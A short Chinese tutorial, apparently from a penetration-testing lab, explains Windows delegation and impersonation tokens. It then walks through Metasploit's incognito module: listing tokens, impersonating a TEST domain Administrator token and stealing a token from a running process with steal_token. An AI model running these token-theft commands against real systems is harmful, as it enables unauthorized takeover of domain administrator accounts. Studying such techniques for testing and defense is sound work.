访问令牌(Access Token)是Windows操作系统用于描述进程或线程安全上下文的一种对象。不同的用户登录计算机后, 都会生成一个Access Token,这个Token在用户创建进程或者线程时会被使用,不断的拷贝。
系统使用访问令牌来辨识拥有进程的用户,以及线程试图执行系统任务时是否具有所需的特权。
windows下的两种令牌:
Delegation token(授权令牌):用于交互会话登录(例如本地用户直接登录、远程桌面登录)
Impersonation token(模拟令牌):用于非交互登录(利用net use访问共享文件夹)两种令牌都是在重启后才会消除,具有Delegation token的用户在注销后,该Token将变成Impersonation token,依旧有效
利用Metasploit的incognito模块令牌假冒
load incognito
加载模块
list_tokens
列举token,-u参数列举用户,-g参数列举用户组
impersonate_token [token]
令牌假冒登录用户在msf session下执行
load incognito
加载模块,执行help
查看模块
list_tokens -u
列举token
发现了TEST域中管理员的token,执行impersonate_token TEST\\Administrator
假冒令牌登录,注意这里要双斜杠
成功窃取令牌登录域管账号
利用steal_token从进程窃取令牌
利用用户启动的进程来窃取令牌登录,这里随便选用pid 4316进行测试,这是TEST/test1启动的
执行命令steal_token 4316
从进程窃取令牌成功
返回原来的用户:
rev2self
或者drop_token